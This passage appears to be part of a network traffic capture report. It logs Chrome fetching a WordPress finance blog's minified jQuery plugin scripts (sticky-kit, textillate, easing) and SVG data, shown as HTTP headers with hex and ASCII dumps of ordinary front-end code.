                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC823INData Raw: 2e 33 30 36 37 20 33 38 2e 35 36 33 32 20 33 35 2e 37 39 30 36 20 33 38 2e 31 36 38 39 20 33 36 2e 35 34 33 35 20 33 38 2e 31 36 38 39 43 33 38 2e 30 31 37 37 20 33 38 2e 31 36 38 39 20 33 38 2e 33 39 38 36 20 33 39 2e 31 36 33 37 20 33 38 2e 33 39 38 36 20 34 30 2e 34 37 36 36 56 34 33 2e 36 36 32 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 35 35 35 35 35 35 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 34 20 34 33 2e 36 36 32 37 48 34 32 2e 34 32 32 36 4c 34 32 2e 33 39 31 33 20 34 33 2e 30 39 33 36 43 34 32 2e 31 37 36 32 20 34 33 2e 33 32 32 31 20 34 31 2e 37 36 33 39 20 34 33 2e 37 38 33 37 20 34 30 2e 39 33 34 39 20 34 33 2e 37 38 33 37 43 34 30 2e 30 33 38 37 20 34 33 2e 37 38 33 37 20 33 39 2e 30 38 38 37 20 34 33 2e
                                                                                                                                                                                                                                                                        Data Ascii: .3067 38.5632 35.7906 38.1689 36.5435 38.1689C38.0177 38.1689 38.3986 39.1637 38.3986 40.4766V43.6627Z" fill="#555555"/> <path d="M44 43.6627H42.4226L42.3913 43.0936C42.1762 43.3221 41.7639 43.7837 40.9349 43.7837C40.0387 43.7837 39.0887 43.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        19192.168.2.449759141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC840OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.sticky-kit.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-17d4"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147803
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bdfb5e18c4-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC877INData Raw: 31 37 64 34 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 69 3b 74 3d 74 68 69 73 2e 6a 51 75 65 72 79 7c 7c 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 69 3d 74 28 77 69 6e 64 6f 77 29 2c 74 2e 66 6e 2e 73 74 69 63 6b 5f 69 6e 5f 70 61 72 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 73 29 7b 76 61 72 20 6f 2c 6e 2c 65 2c 72 2c 63 2c 61 2c 66 2c 6c 2c 75 2c 67 2c 64 2c 6b 2c 68 2c 70 2c 79 2c 76 2c 6d 2c 62 2c 5f 2c 43 3b 66 6f 72 28 6e 75 6c 6c 3d 3d 73 26 26 28 73 3d 7b 7d 29 2c 6b 3d 73 2e 73 74 69 63 6b 79 5f 63 6c 61 73 73 2c 61 3d 73 2e 69 6e 6e 65 72 5f 73 63 72 6f 6c 6c 69 6e 67 2c 64 3d 73 2e 72 65 63 61 6c 63 5f 65 76 65 72 79 2c 67 3d 73 2e 70 61 72 65 6e 74 2c 75 3d 73 2e 6f 66 66 73 65 74 5f 74 6f 70 2c 6c 3d 73 2e 73 70 61 63 65 72 2c
                                                                                                                                                                                                                                                                        Data Ascii: 17d4(function(){var t,i;t=this.jQuery||window.jQuery,i=t(window),t.fn.stick_in_parent=function(s){var o,n,e,r,c,a,f,l,u,g,d,k,h,p,y,v,m,b,_,C;for(null==s&&(s={}),k=s.sticky_class,a=s.inner_scrolling,d=s.recalc_every,g=s.parent,u=s.offset_top,l=s.spacer,
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 72 65 6e 74 28 29 2c 6e 75 6c 6c 21 3d 67 26 26 28 46 3d 46 2e 63 6c 6f 73 65 73 74 28 67 29 29 2c 21 46 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 22 66 61 69 6c 65 64 20 74 6f 20 66 69 6e 64 20 73 74 69 63 6b 20 70 61 72 65 6e 74 22 3b 69 66 28 41 3d 21 31 2c 7a 3d 21 31 2c 6e 75 6c 6c 21 3d 6c 3f 44 3d 6c 26 26 6e 2e 63 6c 6f 73 65 73 74 28 6c 29 3a 76 3f 28 44 3d 6e 2e 63 6c 6f 6e 65 28 21 31 29 29 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 74 69 63 6b 79 2d 73 70 61 63 65 72 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 74 69 63 6b 79 2d 74 72 61 6e 73 69 74 69 6f 6e 22 29 3a 44 3d 6a 51 75 65 72 79 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 75 73 69 6f 6e 2d 73 74 69 63 6b 79 2d 73 70 61 63 65 72 22 20 2f 3e 27
                                                                                                                                                                                                                                                                        Data Ascii: rent(),null!=g&&(F=F.closest(g)),!F.length)throw"failed to find stick parent";if(A=!1,z=!1,null!=l?D=l&&n.closest(l):v?(D=n.clone(!1)).addClass("fusion-sticky-spacer").removeClass("fusion-sticky-transition"):D=jQuery('<div class="fusion-sticky-spacer" />'
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 22 3a 6e 2e 63 73 73 28 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 22 29 2c 66 6c 6f 61 74 3a 6a 7d 2c 76 7c 7c 28 65 2e 68 65 69 67 68 74 3d 78 29 2c 44 2e 63 73 73 28 65 29 29 2c 73 3f 47 28 29 3a 76 6f 69 64 20 30 7d 29 28 29 2c 78 21 3d 3d 66 29 7b 69 66 28 4f 3d 76 6f 69 64 20 30 2c 42 3d 75 2c 54 3d 64 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 73 2c 67 2c 76 2c 6d 2c 62 3b 69 66 28 21 48 29 72 65 74 75 72 6e 20 67 3d 21 31 2c 6e 75 6c 6c 21 3d 54 26 26 30 3e 3d 28 54 2d 3d 31 29 26 26 28 54 3d 64 2c 4d 28 29 2c 67 3d 21 30 29 2c 6e 75 6c 6c 3d 3d 54 7c 7c 67 7c 7c 6f 2e 68 65 69 67 68 74 28 29 3d 3d 3d 51 7c 7c 28 4d 28 29 2c 67 3d 21 30 29 2c 76 3d 69 2e 73 63 72 6f 6c 6c 54 6f 70 28 29
                                                                                                                                                                                                                                                                        Data Ascii: vertical-align":n.css("vertical-align"),float:j},v||(e.height=x),D.css(e)),s?G():void 0})(),x!==f){if(O=void 0,B=u,T=d,G=function(){var t,s,g,v,m,b;if(!H)return g=!1,null!=T&&0>=(T-=1)&&(T=d,M(),g=!0),null==T||g||o.height()===Q||(M(),g=!0),v=i.scrollTop()
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 6e 64 6f 77 2e 73 63 72 6f 6c 6c 44 69 73 61 62 6c 65 64 3f 6e 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 69 6e 67 2d 75 70 22 29 7c 7c 28 6e 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 69 6e 67 2d 75 70 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 69 6e 67 2d 64 6f 77 6e 22 29 2c 69 2e 74 72 69 67 67 65 72 28 22 66 75 73 69 6f 6e 2d 73 74 69 63 6b 79 2d 73 63 72 6f 6c 6c 2d 63 68 61 6e 67 65 22 29 29 3a 6e 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 69 6e 67 2d 64 6f 77 6e 22 29 7c 7c 28 6e 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 69 6e 67 2d 64 6f 77 6e 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28
                                                                                                                                                                                                                                                                        Data Ascii: ndow.scrollDisabled?n.hasClass("fusion-scrolling-up")||(n.addClass("fusion-scrolling-up").removeClass("fusion-scrolling-down"),i.trigger("fusion-sticky-scroll-change")):n.hasClass("fusion-scrolling-down")||(n.addClass("fusion-scrolling-down").removeClass(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1124INData Raw: 64 65 62 6f 75 6e 63 65 29 76 61 72 20 57 3d 66 75 73 69 6f 6e 2e 64 65 62 6f 75 6e 63 65 28 5f 2c 33 35 30 29 3b 72 65 74 75 72 6e 20 43 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6d 7c 7c 28 6d 3d 21 30 2c 5f 28 74 29 2c 57 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 3d 21 31 7d 2c 31 30 30 29 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 26 26 53 2e 6f 62 73 65 72 76 65 28 6e 2e 6e 65 78 74 28 29 5b 30 5d 29 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 48 3d 21 30 2c 69 2e 6f 66 66 28 22 74 6f 75 63 68 6d 6f 76 65 22 2c 47 29 2c 69 2e 6f 66 66 28 22 73 63 72 6f 6c 6c 22 2c 47 29 2c 69 2e 6f 66 66 28 22 72 65 73 69 7a 65 22 2c 5f 29 2c 74 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 66 66 28 22 73 74 69
                                                                                                                                                                                                                                                                        Data Ascii: debounce)var W=fusion.debounce(_,350);return C=function(t){m||(m=!0,_(t),W(),setTimeout(function(){m=!1},100))},b=function(){p&&S.observe(n.next()[0])},I=function(){if(H=!0,i.off("touchmove",G),i.off("scroll",G),i.off("resize",_),t(document.body).off("sti
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        20192.168.2.449766141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC837OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.textillate.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1716"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 56287
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c75ea98c78-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC878INData Raw: 31 37 31 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 2c 69 2c 73 29 7b 76 61 72 20 61 3d 65 2e 74 65 78 74 28 29 2e 73 70 6c 69 74 28 6e 29 2c 6c 3d 22 22 3b 61 2e 6c 65 6e 67 74 68 26 26 28 74 28 61 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6c 2b 3d 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 27 2b 69 2b 28 74 2b 31 29 2b 27 22 3e 27 2b 65 2b 22 3c 2f 73 70 61 6e 3e 22 2b 73 7d 29 2c 65 2e 65 6d 70 74 79 28 29 2e 61 70 70 65 6e 64 28 6c 29 29 7d 76 61 72 20 6e 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 28 74 68 69 73 29 2c 22 22 2c 22 63 68 61 72 22 2c 22 22 29 7d 29 7d 2c 77 6f 72 64 73
                                                                                                                                                                                                                                                                        Data Ascii: 1716!function(t){function e(e,n,i,s){var a=e.text().split(n),l="";a.length&&(t(a).each(function(t,e){l+='<span class="'+i+(t+1)+'">'+e+"</span>"+s}),e.empty().append(l))}var n={init:function(){return this.each(function(){e(t(this),"","char","")})},words
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 73 2e 6f 75 74 45 66 66 65 63 74 73 29 3e 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 22 74 72 75 65 22 21 3d 3d 74 26 26 22 66 61 6c 73 65 22 21 3d 3d 74 3f 74 3a 22 74 72 75 65 22 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 76 61 72 20 6e 3d 65 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 5b 5d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 3f 28 74 2e 65 61 63 68 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 64 65 6c 61 79 73 63 61 6c 65 2f 2c 22 64 65 6c 61 79 53 63 61 6c 65 22 29 3b 2f 5e 64 61 74 61 2d 69 6e 2d 2a 2f 2e 74 65 73 74 28 6e 29 3f 28 73 2e 69 6e 3d 73 2e 69 6e 7c 7c 7b 7d 2c 73 2e 69 6e 5b 6e 2e 72 65 70 6c
                                                                                                                                                                                                                                                                        Data Ascii: s.outEffects)>=0}function i(t){return"true"!==t&&"false"!==t?t:"true"===t}function s(e){var n=e.attributes||[],s={};return n.length?(t.each(n,function(t,e){var n=e.nodeName.replace(/delayscale/,"delayScale");/^data-in-*/.test(n)?(s.in=s.in||{},s.in[n.repl
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 65 29 2e 73 68 6f 77 28 29 3a 74 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 69 74 6c 65 2d 61 6e 69 6d 61 74 65 64 20 22 2b 65 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 2c 22 76 69 73 69 62 6c 65 22 29 2e 73 68 6f 77 28 29 2c 22 74 79 70 65 49 6e 22 21 3d 3d 65 26 26 22 74 79 70 65 4f 75 74 22 21 3d 3d 65 7c 7c 21 6a 51 75 65 72 79 28 22 68 74 6d 6c 22 29 2e 68 61 73 43 6c 61 73 73 28 22 75 61 2d 65 64 67 65 22 29 7c 7c 28 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 69 74 6c 65 2d 61 6e 69 6d 61 74 65 64 20 22 2b 65 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 2c 22 76 69 73 69 62 6c 65 22 29 2c 6e 26 26 6e 28 29 29 2c 74 2e 6f 6e 65 28 22 77 65 62 6b 69 74 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 20
                                                                                                                                                                                                                                                                        Data Ascii: e).show():t.addClass("fusion-title-animated "+e).css("visibility","visible").show(),"typeIn"!==e&&"typeOut"!==e||!jQuery("html").hasClass("ua-edge")||(t.removeClass("fusion-title-animated "+e).css("visibility","visible"),n&&n()),t.one("webkitAnimationEnd
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 74 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 6f 2e 6f 70 74 69 6f 6e 73 2c 75 2e 6c 65 6e 67 74 68 3f 73 28 75 5b 30 5d 29 3a 7b 7d 29 2c 64 3d 6f 2e 24 63 75 72 72 65 6e 74 2e 63 6c 6f 73 65 73 74 28 22 2e 66 75 73 69 6f 6e 2d 61 6e 69 6d 61 74 65 64 2d 74 65 78 74 73 2d 77 72 61 70 70 65 72 22 29 3b 75 2e 61 64 64 43 6c 61 73 73 28 22 63 75 72 72 65 6e 74 22 29 2c 6f 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 69 6e 41 6e 69 6d 61 74 69 6f 6e 42 65 67 69 6e 22 29 2c 63 2e 61 74 74 72 28 22 64 61 74 61 2d 61 63 74 69 76 65 22 2c 75 2e 64 61 74 61 28 22 69 64 22 29 29 2c 22 6c 69 6e 65 22 3d 3d 6f 2e 6f 70 74 69 6f 6e 73 2e 6c 65 6e 67 74 68 3f 6f 2e 24 63 75 72 72 65 6e 74 2e 68 74 6d 6c 28 75 2e 68 74 6d 6c 28 29 29 2e 6c 65 74 74 65 72 69 6e 67 28 22
                                                                                                                                                                                                                                                                        Data Ascii: t.extend(!0,{},o.options,u.length?s(u[0]):{}),d=o.$current.closest(".fusion-animated-texts-wrapper");u.addClass("current"),o.triggerEvent("inAnimationBegin"),c.attr("data-active",u.data("id")),"line"==o.options.length?o.$current.html(u.html()).lettering("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC933INData Raw: 69 67 67 65 72 45 76 65 6e 74 28 22 6f 75 74 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 22 29 2c 63 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 64 61 74 61 2d 61 63 74 69 76 65 22 29 2c 6c 2e 6f 75 74 2e 63 61 6c 6c 62 61 63 6b 26 26 6c 2e 6f 75 74 2e 63 61 6c 6c 62 61 63 6b 28 29 2c 65 26 26 65 28 6f 29 7d 29 7d 2c 6f 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 73 74 61 72 74 22 29 2c 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 6f 2e 69 6e 28 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6f 2e 24 74 65 78 74 73 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6c 65 6e 67 74 68 3b 65 2b 3d 31 2c 21 6f 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 6f 70 26 26
                                                                                                                                                                                                                                                                        Data Ascii: iggerEvent("outAnimationEnd"),c.removeAttr("data-active"),l.out.callback&&l.out.callback(),e&&e(o)})},o.start=function(t){setTimeout(function(){o.triggerEvent("start"),function t(e){o.in(e,function(){var n=o.$texts.children().length;e+=1,!o.options.loop&&
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        21192.168.2.449769141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC622OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easing.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-8ea"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c75a1f41e7-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC878INData Raw: 38 65 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 65 29 7d 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 3d 6e 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 6e 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 65 61 73 69 6e 67 2e 6a 73 77 69 6e 67 3d 6e 2e 65 61 73 69 6e 67 2e 73 77 69 6e 67 3b 76 61 72 20 65 3d 4d 61 74 68 2e 70 6f 77 2c
                                                                                                                                                                                                                                                                        Data Ascii: 8ea!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?exports=n(require("jquery")):n(jQuery)}(function(n){n.easing.jswing=n.easing.swing;var e=Math.pow,
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 6e 2a 6e 2a 6e 2a 6e 7d 2c 65 61 73 65 4f 75 74 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 31 2d 65 28 31 2d 6e 2c 34 29 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3c 2e 35 3f 38 2a 6e 2a 6e 2a 6e 2a 6e 3a 31 2d 65 28 2d 32 2a 6e 2b 32 2c 34 29 2f 32 7d 2c 65 61 73 65 49 6e 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2a 6e 2a 6e 2a 6e 2a 6e 7d 2c 65 61 73 65 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 31 2d 65 28 31 2d 6e 2c 35 29 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3c 2e 35 3f 31 36 2a 6e 2a 6e 2a 6e 2a 6e 2a
